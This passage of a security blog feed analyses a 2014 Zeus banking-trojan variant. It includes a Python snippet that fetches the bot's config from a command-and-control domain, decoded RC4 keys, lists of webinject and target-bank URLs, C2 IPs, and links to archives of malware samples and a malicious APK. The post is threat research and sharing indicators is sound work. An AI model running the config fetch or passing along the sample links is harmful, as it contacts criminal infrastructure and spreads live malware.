You can find the samples related to 212.44.64.202 with config and decoded here:&lt;br /&gt;
&lt;a href=&quot;http://temari.fr/vx/ZeusVMs_212.44.64.202.7z&quot;&gt;http://temari.fr/vx/ZeusVMs_212.44.64.202.7z&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Some other ZeusVM samples (not related to 212.44.64.202):&lt;br /&gt;
&lt;a href=&quot;http://temari.fr/vx/ZeusVMs_v1.0.0.2_v1.0.0.5.7z&quot;&gt;http://temari.fr/vx/ZeusVMs_v1.0.0.2_v1.0.0.5.7z&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root/root&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOSdBaaFZXsbeDTaHdkvbAMesQ9uor30prUwiiPM35XW7to99apJt3aEaOzOQTE75dA2BiIF6gX1IADv1d1IhuFXyDjDCeSSw_kA47tfv_AzqX1_-Rj4MT_EFuz-siIzaWI2vP63gxwQ/s1600/mfw_kins.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOSdBaaFZXsbeDTaHdkvbAMesQ9uor30prUwiiPM35XW7to99apJt3aEaOzOQTE75dA2BiIF6gX1IADv1d1IhuFXyDjDCeSSw_kA47tfv_AzqX1_-Rj4MT_EFuz-siIzaWI2vP63gxwQ/s1600/mfw_kins.png&quot; height=&quot;241&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2014/04/zeusvm-and-steganography.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjskgkmq1Ur6-adBTRJZ_MtOPQ2atkCH_xXUJhI5y27lWi9I9_sNBfZ-6vZjHTaK1vuXfIh1IA-Ip-l8irPmteIEnRciBP_HlfSpKk1O8rePVx3o9ZW3lXKLKq3eBcKh9-geCsjsGlb7kA/s72-c/16-02-2014+16-30-34.png" height="72" width="72"/><thr:total>14</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8832729250252819938</guid><pubDate>Tue, 04 Mar 2014 18:30:00 +0000</pubDate><atom:updated>2014-03-04T19:36:55.632+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Perkel</category><category domain="http://www.blogger.com/atom/ns#">Perkele</category><category domain="http://www.blogger.com/atom/ns#">Trusteer-Mobile.apk</category><category domain="http://www.blogger.com/atom/ns#">Zeus 1.1.2.1</category><category domain="http://www.blogger.com/atom/ns#">Zeus 1.1.3.4</category><category domain="http://www.blogger.com/atom/ns#">Zeus v2</category><title>Zeus 1.1.3.4</title><description>&lt;a href=&quot;http://israel.emc.com/emc-plus/rsa-thought-leadership/firstwatch/index.htm&quot;&gt;RSA FirstWatch&lt;/a&gt; throw me recently a sample of a &#39;new&#39; Zeus variant.&lt;br /&gt;
I didn&#39;t really check all the changes that were made but seem it&#39;s nothing more than just a standard Zeus v2.&lt;br /&gt;
But wait, it communicates over SSL and had a new kind of HTTP request pattern:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgimmriXRVKKaaSDYl5zAcFHZ6fTN7I2OdrY-Y-uMMEdXRwCndcSiLnxkcVE8gbIZgorUHNMm4H_bWF11ZYJw1ILilSWUPGxGqYrCCtVKaErI12jOi4-tnsCAPdssFD_4snPqB7lPrHN8E/s1600/04-03-2014+18-38-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgimmriXRVKKaaSDYl5zAcFHZ6fTN7I2OdrY-Y-uMMEdXRwCndcSiLnxkcVE8gbIZgorUHNMm4H_bWF11ZYJw1ILilSWUPGxGqYrCCtVKaErI12jOi4-tnsCAPdssFD_4snPqB7lPrHN8E/s1600/04-03-2014+18-38-34.png&quot; height=&quot;293&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Fiddler: &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixpPQeo-kHB_FY7ijor7ok1lmkzyxFmKu6vRRWYGkQwXb9jJKKkZsUIVLrbRbjmsTSLqTc-2870Hr2xgdFQMt6QDlikh5F3p6Q9iExx0YO4XFT7XaRhYNLZosa8Sg1N3jSni6ao81L3HE/s1600/02-03-2014+21-14-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixpPQeo-kHB_FY7ijor7ok1lmkzyxFmKu6vRRWYGkQwXb9jJKKkZsUIVLrbRbjmsTSLqTc-2870Hr2xgdFQMt6QDlikh5F3p6Q9iExx0YO4XFT7XaRhYNLZosa8Sg1N3jSni6ao81L3HE/s1600/02-03-2014+21-14-59.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Config download in python:&lt;br /&gt;
&lt;div class=&quot;python&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;import&lt;/span&gt; &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
request = &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;Request&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;https://secureinformat.com/?ajax&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
request.&lt;span style=&quot;color: black;&quot;&gt;add_header&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;Accept&#39;&lt;/span&gt;,     &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;*/*&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
request.&lt;span style=&quot;color: black;&quot;&gt;add_header&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;X_ID&#39;&lt;/span&gt;,       &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;14E255CE7875768FBC303C10&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
request.&lt;span style=&quot;color: black;&quot;&gt;add_header&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;X_OS&#39;&lt;/span&gt;,       &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;510&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
request.&lt;span style=&quot;color: black;&quot;&gt;add_header&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;X_BV&#39;&lt;/span&gt;,       &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;1.1.3.4&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
request.&lt;span style=&quot;color: black;&quot;&gt;add_header&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;Control&#39;&lt;/span&gt;,    &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;no-cache&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
request.&lt;span style=&quot;color: black;&quot;&gt;add_header&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;User-Agent&#39;&lt;/span&gt;, &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
page = &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlopen&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;request&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;read&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: green;&quot;&gt;open&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;ajax&#39;&lt;/span&gt;, &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;w&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;write&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;page&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Notice the new headers:&lt;br /&gt;
X_ID = Bot ID&lt;br /&gt;
X_OS = OS version&lt;br /&gt;
X_BV = Variant version&lt;br /&gt;
&lt;br /&gt;
The answer of the server have  X_ID as cookie:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&amp;lt;&amp;lt; HTTP/1.1 200 OK&lt;br /&gt;
&amp;lt;&amp;lt; Date: Fri, 28 Feb 2014 06:35:34 GMT&lt;br /&gt;
&amp;lt;&amp;lt; Server: Apache&lt;br /&gt;
&amp;lt;&amp;lt; Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/&lt;br /&gt;
&amp;lt;&amp;lt; Content-Description: File Transfer&lt;br /&gt;
&amp;lt;&amp;lt; Content-Disposition: attachment; filename=ajax&lt;br /&gt;
&amp;lt;&amp;lt; Content-Transfer-Encoding: binary&lt;br /&gt;
&amp;lt;&amp;lt; Expires: 0&lt;br /&gt;
&amp;lt;&amp;lt; Cache-Control: must-revalidate, post-check=0, pre-check=0&lt;br /&gt;
&amp;lt;&amp;lt; Pragma: public&lt;br /&gt;
&amp;lt;&amp;lt; Content-Length: 3685&lt;br /&gt;
&amp;lt;&amp;lt; Connection: close&lt;br /&gt;
&amp;lt;&amp;lt; Content-Type: application/octet-stream&lt;/div&gt;
&lt;br /&gt;
Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
Version: 1.1.3.4 &lt;br /&gt;
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE&lt;br /&gt;
Drop Point: http://localhost/gate.php&lt;br /&gt;
Infection Point: http://localhost/bot.exe&lt;br /&gt;
Update Point:&lt;br /&gt;
http://secureinformat.com/?ajax (static config)&lt;/div&gt;
&lt;br /&gt;
For unpacking the config, here again nothing new, regular Zeus v2.&lt;br /&gt;
Once unpacked, we can see that the malware is targeting German banks and Trusteer:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
http*://*netbanking.sparkasse.at/hilfe/sicherheit*&lt;br /&gt;
https://*banking.berliner-bank.de/trxm*&lt;br /&gt;
https://*banking.co.at*&lt;br /&gt;
https://*commerzbank.de*&lt;br /&gt;
https://*commerzbanking.de*&lt;br /&gt;
https://*meine.deutsche-bank.de/trxm/db*&lt;br /&gt;
https://*meine.norisbank.de/trxm/noris*&lt;br /&gt;
https://banking.postbank.de/rai*&lt;br /&gt;
https://banking.sparda.de*&lt;br /&gt;
https://finanzportal.fiducia.de*&lt;br /&gt;
https://netbanking.sparkasse.at/*&lt;br /&gt;
https://netbanking.sparkasse.at/casserver/login*&lt;br /&gt;
https://netbanking.sparkasse.at/sPortal/*&lt;br /&gt;
https://online-*.unicredit.it/*&lt;br /&gt;
https://online.bankaustria.at*&lt;br /&gt;
https://*commerzbank.de*&lt;br /&gt;
https://*commerzbanking.de*&lt;br /&gt;
https://*meine.deutsche-bank.de/trxm/db*&lt;br /&gt;
https://*meine.norisbank.de/trxm/noris*&lt;br /&gt;
https://www.trusteer.com/ProtectYourMoney*&lt;/div&gt;
WebInjects:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
https://secure730.com/oz1/service.in?id=50&lt;br /&gt;
https://secure730.com/oz1/service.in?id=44&lt;br /&gt;
https://secure730.com/oz1/service.in?id=43&lt;br /&gt;
https://secure730.com/oz1/service.in?id=41&lt;br /&gt;
https://secure730.com/oz1/service.in?id=7&lt;br /&gt;
https://secure730.com/oz1/service.in?id=6&lt;br /&gt;
https://secure730.com/oz1/service.in?id=4&lt;br /&gt;
https://secure730.com/oz1/service.in?id=3&lt;br /&gt;
https://secure730.com/oz1/service.in?id=2&lt;br /&gt;
https://secure730.com/oz1/service.in?id=1&lt;br /&gt;
https://secureinformat.com/id/351&lt;br /&gt;
https://secureinformat.com/id/350&lt;br /&gt;
https://secureinformat.com/id/51&lt;br /&gt;
https://secureinformat.com/id/10&lt;/div&gt;
&lt;br /&gt;
Man in the browser:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOttnq8hc6iCfXEWskvYghbCmm5aiPMdI50oFDjOOZbigoOR78mpmOq3zFGGBH6Mbn_dUJ47mAQoI0XwHhxv6WBBsgxRxOuFtCwA4dwAqKU2oaBbsxy0eInLW3JPxmOLSV6c3S3G0FNWI/s1600/04-03-2014+18-12-39.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOttnq8hc6iCfXEWskvYghbCmm5aiPMdI50oFDjOOZbigoOR78mpmOq3zFGGBH6Mbn_dUJ47mAQoI0XwHhxv6WBBsgxRxOuFtCwA4dwAqKU2oaBbsxy0eInLW3JPxmOLSV6c3S3G0FNWI/s1600/04-03-2014+18-12-39.png&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Clean browser surfing Trusteer website:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_ovq8FMNTGnuhQ8vgIvG00_-e06Ed-hlsfdVunf0ywk7kEiElkqKMicPB8I6mn9_DlxwPSO9iWaM-iardKmfcpNTuNMMJ_FVW7SyatSjjnUfHDAytR8p7iqUzPKby9PpQvZq0QjfipI/s1600/02-03-2014+19-21-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_ovq8FMNTGnuhQ8vgIvG00_-e06Ed-hlsfdVunf0ywk7kEiElkqKMicPB8I6mn9_DlxwPSO9iWaM-iardKmfcpNTuNMMJ_FVW7SyatSjjnUfHDAytR8p7iqUzPKby9PpQvZq0QjfipI/s1600/02-03-2014+19-21-08.png&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
Infected browser surfing Trusteer website:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_Qmmrm_JiwhZgX5iuKo_pt2fHC4ilXR2TVgWx7xB-a-nIfhuGvl0EZrUvqUOFRwJaqlJBwWSKmlDTrJC23Ku-lobvM-RTDZevw0op0JJWHkfC2ja5y6NIe6Cb2zLss5XL7nwmI_UfHBY/s1600/02-03-2014+18-58-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_Qmmrm_JiwhZgX5iuKo_pt2fHC4ilXR2TVgWx7xB-a-nIfhuGvl0EZrUvqUOFRwJaqlJBwWSKmlDTrJC23Ku-lobvM-RTDZevw0op0JJWHkfC2ja5y6NIe6Cb2zLss5XL7nwmI_UfHBY/s1600/02-03-2014+18-58-56.png&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Requesting the user to download an APK:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HnQ4uzsgxJ7IzmEqrRdGC2dtLKelje-BzdMTV-z2W5UwYo9hRgr1RhiYaRDv-VxE0u2E8wWQ6Z55rW0wJwJXSK5eNEeLfpxYkPpKhRDJffzTLOPvTa90TXiRP4r-733GYdSnGgOYKVM/s1600/02-03-2014+18-59-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HnQ4uzsgxJ7IzmEqrRdGC2dtLKelje-BzdMTV-z2W5UwYo9hRgr1RhiYaRDv-VxE0u2E8wWQ6Z55rW0wJwJXSK5eNEeLfpxYkPpKhRDJffzTLOPvTa90TXiRP4r-733GYdSnGgOYKVM/s1600/02-03-2014+18-59-13.png&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Test done on the latest Firefox version (v27.0.1)&lt;br /&gt;
&lt;br /&gt;
bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk&lt;br /&gt;
&amp;gt;&amp;gt; &lt;a href=&quot;https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/&quot;&gt;https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/&lt;/a&gt;&lt;br /&gt;
Phone number:&amp;nbsp; 79670478968&lt;br /&gt;
&lt;br /&gt;
Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it&#39;s another story)&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjckgwGAODBGy3yfvcPqxX4ZNW2f04m6hyhKW9Kia41ZaMuwarBNayN0C1fq4__Mh6VGU6Hz25Bs6094iv0EqZiLI3HFgEVOd3Ggf0aSrqWJ0VnIkIe2WavxnmPrI348fKTvfN8rDkj-rY/s1600/03-03-2014+13-09-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjckgwGAODBGy3yfvcPqxX4ZNW2f04m6hyhKW9Kia41ZaMuwarBNayN0C1fq4__Mh6VGU6Hz25Bs6094iv0EqZiLI3HFgEVOd3Ggf0aSrqWJ0VnIkIe2WavxnmPrI348fKTvfN8rDkj-rY/s1600/03-03-2014+13-09-31.png&quot; height=&quot;400&quot; width=&quot;345&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Sort of Fake AV:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwfAUPIjdQW_fGzj2eiId5_vJRGLzdoaIUGcdnK09BSV6fsOgMorc9ef4m9C7kFTKnVnxO5CfOA1af0RJzAmdpG8csoth-rvEOX7uqIaC4_hg1PV4DsbCnVqquH7KeQpDQDDk_zy3H4M/s1600/Screenshot+from+2014-03-04+19_11_23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwfAUPIjdQW_fGzj2eiId5_vJRGLzdoaIUGcdnK09BSV6fsOgMorc9ef4m9C7kFTKnVnxO5CfOA1af0RJzAmdpG8csoth-rvEOX7uqIaC4_hg1PV4DsbCnVqquH7KeQpDQDDk_zy3H4M/s1600/Screenshot+from+2014-03-04+19_11_23.png&quot; height=&quot;400&quot; width=&quot;240&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Sample: 917df7b6268ba705b192b89a1cf28764&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
Version: 1.1.3.4&lt;br /&gt;
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE&lt;br /&gt;
Drop Point: http://localhost/gate.php&lt;br /&gt;
Infection Point: http://localhost/bot.exe&lt;br /&gt;
Update Points:&lt;br /&gt;
https://koloboktv.com/?ajax (static config)&lt;br /&gt;
https://securestakan2.net/?ajax (dynamic config)&lt;br /&gt;
https://securemagnit5.net/?ajax (dynamic config)&lt;/div&gt;
WebInjects:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
https://pikachujp.com/oz1/service.in?id=50&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=44&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=43&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=41&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=7&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=6&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=4&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=3&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=2&lt;br /&gt;
https://pikachujp.com/oz1/service.in?id=1&lt;br /&gt;
https://koloboktv.com/id/351&lt;br /&gt;
https://koloboktv.com/id/350&lt;br /&gt;
https://koloboktv.com/id/51&lt;br /&gt;
https://koloboktv.com/id/10&lt;/div&gt;
&lt;br /&gt;
Sample: 7fb62987f20b002475cb1499eb86a1f5&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
Version: 1.1.2.1&lt;br /&gt;
RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D&lt;br /&gt;
Update Point:&lt;br /&gt;
https://securestatic.com/?ajax (static config)&lt;/div&gt;
&lt;br /&gt;
All these samples use the same IP range:&lt;br /&gt;
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM&lt;br /&gt;
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM&lt;br /&gt;
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ&lt;br /&gt;
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM&lt;br /&gt;
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM&lt;br /&gt;
&lt;br /&gt;
I&#39;ve wrote a small &lt;a href=&quot;http://pastebin.com/VHBd72jr&quot;&gt;yara rule&lt;/a&gt; in hope to see more of these.&lt;br /&gt;
All configs that i grabbed was reporting to localhost not to a server...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
